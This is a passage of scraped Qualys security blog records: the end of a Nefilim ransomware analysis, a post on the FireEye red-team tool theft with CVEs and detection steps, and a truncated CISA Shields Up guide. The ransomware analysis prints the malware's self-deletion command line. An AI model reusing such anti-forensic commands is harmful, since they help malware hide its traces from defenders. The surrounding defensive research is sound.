\"C:\\Windows\\System32\\cmd.exe\" /c timeout /t 3 /nobreak && del \"C:\\Users\\admin\\Download{ransomware_filename}.exe\" /s /f /q\n\nFig. 7 Self Deletion\n\n### High-Profile Attacks Taking a Toll\n\nNefilim's highest-profile ransomware attack to date was against the Australian shipping organization, [Toll Group](<https://www.tollgroup.com/toll-it-systems-updates>). The attack was first published on May 5, 2020. Two months previously, Toll Group was a victim of a Netwalker ransomware attack. In both cases, Toll Group refused to pay the ransom. In response, Nefilim leaked sensitive Toll Group data and [popularized](<https://www.bankinfosecurity.com/blogs/toll-group-data-leaked-following-second-ransomware-incident-p-2902>) that Toll Group had failed to employ full cybersecurity protocols even after the Netwalker attack, potentially making the organization vulnerable to more attacks. This demonstrates how Nefilim will keep the pressure on its victims to pay ransoms.\n\n### Mitigation or Additional Important Safety Measures\n\n#### Network\n\n * Keep strong and unique passwords for login accounts.\n * Disable RDP if not used. If required change RDP port to a non-standard port.\n * Configure firewall in following way,\n * Deny access to Public IPs to important ports (in this case RDP port 3389)\n * Allow access to only IP\u2019s which are under your control.\n * Use VPN to access the network, instead of exposing RDP to the Internet. Possibility implement Two Factor Authentication (2FA).\n * Set lockout policy which hinders credentials guessing.\n * Create a separate network folder for each user when managing access to shared network folders.\n\n#### Take regular data backup\n\n * Protect systems from ransomware by periodically backing up important files regularly and keep a recent backup copy offline. Encrypt your backup.\n * If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed.\n * Always use a combination of online and offline backup.\n * Do not keep offline backups connected to your system as this data could be encrypted when ransomware strike.\n\n#### Keep software updated\n\n * Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware.\n * Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.\n * Do not download cracked/pirated software as they risk backdoor entry for malware into your computer.\n * Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.\n\n#### Having minimum required privileges\n\n * Don\u2019t assign Administrator privileges to users. Most importantly, do not stay logged in as an administrator unless it is strictly necessary. Also, avoid browsing, opening documents, or other regular work activities while logged in as an administrator.\n\n### Monitor for Lateral Movement\n\n * To spot these attacks, keep an eye out not only for attack code but also monitor for any evidence of lateral movement and data exfiltration within the environment. To determine if an organization has been hit by Nefilim, check remote-access systems for any signs of unauthorized access. To identify potential data exfiltration, additionally identify unusual host outbound traffic patterns.\n\n### Nefilim TTP Map\n\nInitial Access| Execution| Defense Evasion| Credential Access| Discovery| Lateral Movement| Exfiltration| Impact \n---|---|---|---|---|---|---|--- \nExploit Public-Facing Application (T1190)| Native API (T1106)| File Deletion (T1070.004)| OS Credential Dumping (T1003)| Software Discovery: Security Software Discovery (T1518.001)| Lateral Tool Transfer (T1570)| Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)| Data Encrypted for impact (T1486) \n| | Impair Defenses: Disable or Modify Tools (T1562:001)| | Remote System Discovery (T1018)| | | Inhibit system Recovery (T1490) \n| | | | System Information Discovery (T1082)| | | \n| | | | File and Directory Discovery (T1083)| | | \n \n### Indicators of Compromise (IOCs)\n\n**SHA256**\n \n \n 8be1c54a1a4d07c84b7454e789a26f04a30ca09933b41475423167e232abea2b \n b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e \n 3080b45bab3f804a297ec6d8f407ae762782fa092164f8ed4e106b1ee7e24953 \n 7de8ca88e240fb905fc2e8fd5db6c5af82d8e21556f0ae36d055f623128c3377 \n b227fa0485e34511627a8a4a7d3f1abb6231517be62d022916273b7a51b80a17 \n 3bac058dbea51f52ce154fed0325fd835f35c1cd521462ce048b41c9b099e1e5 \n 353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5 \n 5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6 \n 52e25bdd600695cfed0d4ee3aca4f121bfebf0de889593e6ba06282845cf39ea \n 35a0bced28fd345f3ebfb37b6f9a20cc3ab36ab168e079498f3adb25b41e156f \n 7a73032ece59af3316c4a64490344ee111e4cb06aaf00b4a96c10adfdd655599 \n 08c7dfde13ade4b13350ae290616d7c2f4a87cbeac9a3886e90a175ee40fb641 \n D4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 \n B8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e \n fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020\n\n### References\n\n * <https://www.zdnet.com/article/nemty-ransomware-operation-shuts-down/>\n * <https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/>\n * <https://www.bleepingcomputer.com/news/security/nemty-ransomware-punishes-victims-by-posting-their-stolen-data/>\n * <https://www.trendmicro.com/vinfo/au/security/news/cybercrime-and-digital-threats/updated-analysis-on-nefilim-ransomware-s-behavior>\n * <https://www.bankinfosecurity.com/blogs/toll-group-data-leaked-following-second-ransomware-incident-p-2902>\n * <https://www.tollgroup.com/toll-it-systems-updates>\n * <https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks>", "cvss3": {}, "published": "2021-05-12T15:34:00", "type": "qualysblog", "title": "Nefilim Ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11634", "CVE-2019-19781"], "modified": "2021-05-12T15:34:00", "id": "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a governments\u2019 response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform****\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys is recommending all organizations to establish the following actionable steps to adopt heightened cybersecurity posture to protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance: \n\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n****Implement CISA\u2019s Shields Up Guidance****\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets \n\n\n#### Discover and protect your external facing assets \n\n\nAn organization\u2019s internet-facing systems represent much of their potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, report open ports, and detected services on each port. Qualys CSAM supports extensive query language that enables teams to report and act on detected external facing assets that have a remote-control service running (for example Windows Remote Desktop). \n\n\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software****\n\nFlag assets within your inventory that are missing antivirus, or with signatures that are not up to date. CSAM allows you to define Software Rules and assign required software on a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\n\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\n\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR will monitor endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus such as Living-off-the-Land attacks as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys Researcher analyzed all the 300+ CVEs from CISA known exploited vulnerabilities and mapped them to the Qualys QIDs. Many of these CVEs have patches available for the past several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerabilities reports that are focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. \n\nFollowing are some of the critical vulnerabilities cataloged by CISA, as specifically known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability(CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021- 26857 CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities \n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create a patch and configuration fix jobs to remediate the risk of all vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate those vulnerabilities by downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are automatically fixed including the new vulnerabilities added to the CISA catalog in the future. \n\n\n\n#### Monitor and ensure your software are always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and corresponding support status, to help organizations manage their technical debt and to reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life & end-of-support dates.\n\n\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk opposed. Prioritize your remediation efforts based on software that introduces the most risk. Use this report to create automated patch jobs to ensure that the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. \n\n\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 are the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations****\n\nProtect your public cloud infrastructure by securing the following services on priority:\n\n * **IAM**: Ensure all users are MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\n Automatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n\n\n#### Protect your Office 365 and Other SaaS Services****\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with different admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe 